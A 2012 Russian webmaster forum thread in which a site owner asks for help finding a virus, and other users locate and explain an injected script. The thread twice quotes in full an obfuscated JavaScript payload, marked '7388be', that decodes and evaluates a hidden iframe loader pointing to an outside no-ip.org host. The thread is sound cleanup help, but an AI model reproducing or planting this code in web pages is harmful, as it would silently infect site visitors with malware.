Помогите найти вирус на сайте

90

Pokler1111

10 апреля 2012, 12:54

655

autosos(.)com(.)ua

помогите найти вирус. целый день копаюсь... без толку!

NW

77

niko-web

10 апреля 2012, 12:57

#1

Pokler1111:
autosos(.)com(.)ua
помогите найти вирус. целый день копаюсь... без толку!

Вирусов не обнаружено

Google.com относит данный сайт к безопасным

Yandex.ru относит данный сайт к безопасным

---------- Добавлено 10.04.2012 в 16:58 ----------

Pokler1111:
autosos(.)com(.)ua
помогите найти вирус. целый день копаюсь... без толку!

nvkpodop.no-ip.org что это за ссылка ?

---------- Добавлено 10.04.2012 в 17:01 ----------

Pokler1111:
autosos(.)com(.)ua
помогите найти вирус. целый день копаюсь... без толку!

вот он после тега <body>!

<!--7388be--><script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='v'+zz;ss=[];if(1){f='fr'+'omCharCode';}w=this;e=w[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~60~24~23.5~23~24.5~23~27~22~51.5~54~50~54.5~48~54.5~59~22~56~57.5~22.5~50.5~54.5~22~55~51~55~30.5~56.5~51.5~49~29.5~24~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~60~24~23.5~23~24.5~23~27~22~51.5~54~50~54.5~48~54.5~59~22~56~57.5~22.5~50.5~54.5~22~55~51~55~30.5~56.5~51.5~49~29.5~24~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5"["split"]("a~".substr(1));for(i=3-2-1;i!=585;i++){j=i;if(st)ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(st)e(""+q);</script><!--/7388be-->

1

Анкета для новичков и профессионалов, вопросы могут быть разными!

90

Pokler1111

10 апреля 2012, 13:02

#2

нод32 не пускает на сайт, и проверка показывает http://antivirus-alarm.ru/proverka/?url=autosos.com.ua%2Fru%2Ftarif%2Fevacuat%2F

NW

77

niko-web

10 апреля 2012, 13:02

#3

удали это код со всех страниц и смотри в поблике, если есть подозрительные js файлы тоже удали !

---------- Добавлено 10.04.2012 в 17:03 ----------

Pokler1111:
нод32 не пускает на сайт, и проверка показывает http://antivirus-alarm.ru/proverka/?url=autosos.com.ua%2Fru%2Ftarif%2Fevacuat%2F

я же говорю вирус у тебя после тега <body> что так сложно понять ?

он и генерирует ссылку nvkpodop.no-ip.org

Яндекс.Вебмастер О чем нужно помнить Google: переписывание тегов title

90

Pokler1111

10 апреля 2012, 13:10

#4

как найти откуда подгружается этот код?

NW

77

niko-web

10 апреля 2012, 13:20

#5

Pokler1111:
как найти откуда подгружается этот код?

открой все файли в текстовом документе и найди тег <body> и сразу после его код

<!--7388be--><script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='v'+zz;ss=[];if(1){f='fr'+'omCharCode';}w=this;e=w[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~60~24~23.5~23~24.5~23~27~22~51.5~54~50~54.5~48~54.5~59~22~56~57.5~22.5~50.5~54.5~22~55~51~55~30.5~56.5~51.5~49~29.5~24~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~60~24~23.5~23~24.5~23~27~22~51.5~54~50~54.5~48~54.5~59~22~56~57.5~22.5~50.5~54.5~22~55~51~55~30.5~56.5~51.5~49~29.5~24~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5"["split"]("a~".substr(1));for(i=3-2-1;i!=585;i++){j=i;if(st)ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(st)e(""+q);</script><!--/7388be-->

вот его и удаляй !

если не получится дайте доступ по фтп и я удалю !

если что пиши в ЛС.

78

WebGomel

10 апреля 2012, 13:59

#6

Ну так это довольно старый вирус, давно его не встречал.

Просто поиском по файлам пройтись, искать 7388be и все файлы с этой дрянью найдутся.

Удалённый системный администратор ( https://remadmin.com )

NW

77

niko-web

10 апреля 2012, 15:17

#7

WebGomel:
Ну так это довольно старый вирус, давно его не встречал.
Просто поиском по файлам пройтись, искать 7388be и все файлы с этой дрянью найдутся.

ну вот по ходу он не имеет столько опыта !🤪

1

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы